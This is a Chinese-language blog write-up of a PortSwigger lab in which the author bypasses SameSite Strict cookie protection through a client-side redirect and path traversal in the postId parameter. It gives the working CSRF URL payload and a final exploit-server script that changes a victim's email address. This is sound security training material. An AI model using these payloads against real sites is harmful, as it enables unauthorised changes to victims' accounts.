某不知名博客 某不知名博客
首页
  • 《vulcat文档》
  • Web安全

    • 《BurpSuite及官方实验室》
    • 《OSWE学习历程》
  • 云原生安全

    • 《Docker命令大全》
    • 《CKS考试学习指南》
    • 《旧-Kubernetes教程》
漏洞库
  • 《渗透工具大全》
  • 《云安全》
事件库
关于
  • 分类
  • 标签
  • 归档
GitHub (opens new window)

Carsaid

安全界的小学生
首页
  • 《vulcat文档》
  • Web安全

    • 《BurpSuite及官方实验室》
    • 《OSWE学习历程》
  • 云原生安全

    • 《Docker命令大全》
    • 《CKS考试学习指南》
    • 《旧-Kubernetes教程》
漏洞库
  • 《渗透工具大全》
  • 《云安全》
事件库
关于
  • 分类
  • 标签
  • 归档
GitHub (opens new window)
  • 前言

  • 服务器端主题(翻译)

  • 客户端主题(翻译)

  • 高级主题(翻译)

  • 扩展阅读(翻译)

  • 个人学习笔记

  • 实验室做题记录

    • 实验室做题记录
    • 服务器端

    • 客户端

      • 跨站脚本(XSS)

      • 跨站请求伪造(CSRF)

        • 学徒-没有防御措施的CSRF漏洞
        • 从业者-CSRF-令牌验证取决于请求方法
        • 从业者-CSRF-令牌验证取决于令牌是否存在
        • 从业者-CSRF-令牌未绑定到用户会话
        • 从业者-CSRF-令牌绑定到非会话cookie
        • 从业者-CSRF-令牌仅在Cookie中复制
        • 从业者-SameSite Lax绕过-覆盖请求方法
        • 从业者-SameSite Strict绕过-客户端重定向
          • 题目
          • 实操
        • 从业者-SameSite Strict绕过-易受攻击的同级域
        • 从业者-SameSite Lax绕过-Cookie刷新
        • 从业者-CSRF-Referer验证取决于标头是否存在
        • 从业者-CSRF-Referer验证中断
      • 跨域资源共享(CORS)

      • 点击劫持

      • 基于DOM的漏洞

      • WebSockets

    • 高级主题

  • BurpSuite及官方实验室
  • 实验室做题记录
  • 客户端
  • 跨站请求伪造(CSRF)
carsaid
2023-10-06
目录

从业者-SameSite Strict绕过-客户端重定向

# 实验室:SameSite Strict绕过-客户端重定向

# 题目

此实验室的 电子邮件更改功能 容易受到 CSRF 的攻击。若要解决实验室问题,请使用漏洞利用服务器托管一个 HTML 页面,该页面使用 CSRF 攻击来更改查看者的电子邮件地址。

你可以使用以下凭据登录到自己的帐户:wiener:peter

提示

你不能注册已被其他用户占用的电子邮件地址。如果你在测试漏洞期间 更改了自己的电子邮件地址,请你确保——向受害者发送的最终漏洞利用中,应包含不同的电子邮件地址。

实验室-从业者

SameSite Strict绕过-客户端重定向 >>

- name: 实验室-从业者
  desc: SameSite Strict绕过-客户端重定向 >>
  avatar: https://fastly.statically.io/gh/clincat/blog-imgs@main/vuepress/static/imgs/docs/burpsuite-learn/public/lab-logo.png
  link: https://portswigger.net/web-security/csrf/bypassing-samesite-restrictions/lab-samesite-strict-bypass-via-client-side-redirect
  bgColor: '#001350'
  textColor: '#4cc1ff'
1
2
3
4
5
6

# 实操

点击 “ACCESS THE LAB” 进入实验室。

Not Found Image

一个博客站点。

Not Found Image

进入任意一篇文章的详情页,发表一个评论。

Not Found Image

提交评论之后,会出现一个 “感谢提交” 的网页,短时间内会自动进行跳转,重定向至上一文章。

Not Found Image

查看产生的请求数据包,加载了一个用于重定向的 js 文件,并将路径/post传递给其中的某个函数,以实现重定向功能。

Not Found Image

查看 js 文件中实现的功能,当你在 “感谢提交” 页面等待 3 秒之后,页面会自动进行跳转:

redirectOnConfirmation = (blogPath) => {
    setTimeout(() => {
        const url = new URL(window.location);
        const postId = url.searchParams.get("postId");
        window.location = blogPath + '/' + postId;
    }, 3000);
}
1
2
3
4
5
6
7

其中,postId参数是可控的,它会从 URL 的 GET 参数中动态获取。

Not Found Image

以下动图演示了控制postId参数并进行任意重定向:

https://<目标站点>/post/comment/confirmation?postId=abcdefg
1

可以看到,3 秒之后成功跳转到了/abcdefg目录。

Not Found Image

然后捕获一个 “更新邮箱” 的请求数据包。

Not Found Image

同时发现,修改请求方法为 GET,也能请求成功。

Not Found Image

既然可以通过 GET 请求来更改邮箱,那就不需要生成 CSRF PoC 了,我们可以直接使用自包含攻击:

https://<目标站点>/post/comment/confirmation?postId=../../my-account/change-email?email=x%40y.z&submit=1
1

以下动图演示了以上攻击过程,但遇到了错误 “缺少submit参数”。

可我们明明加了submit参数呀?

Not Found Image

查看产生的请求数据包,噢!原来submit参数被当做第一个数据包的参数了,没有被带入到第二个数据包的 URL 中。

Not Found Image

这好办,对符号&进行一次 URL 编码即可:

https://<目标站点>/post/comment/confirmation?postId=../../my-account/change-email?email=x%40y.z%26submit=1
1

然后通过window.location构造一个载荷,保存到漏洞利用服务器上:

<script>
  window.location = 'https://<目标站点>/post/comment/confirmation?postId=../../my-account/change-email?email=j%40k.l%26submit=1';
</script>
1
2
3
Not Found Image

以下动图演示了最终的攻击过程:

Not Found Image

将载荷发送给受害用户,实验完成。

Not Found Image
编辑 (opens new window)
从业者-SameSite Lax绕过-覆盖请求方法
从业者-SameSite Strict绕过-易受攻击的同级域

← 从业者-SameSite Lax绕过-覆盖请求方法 从业者-SameSite Strict绕过-易受攻击的同级域→

最近更新
01
API测试笔记
04-30
02
msfvenom
03-29
03
Metasploit
03-29
更多文章>
Theme by Vdoing | Copyright © 2023-2024 Carsaid | MIT License
  • 跟随系统
  • 浅色模式
  • 深色模式
  • 阅读模式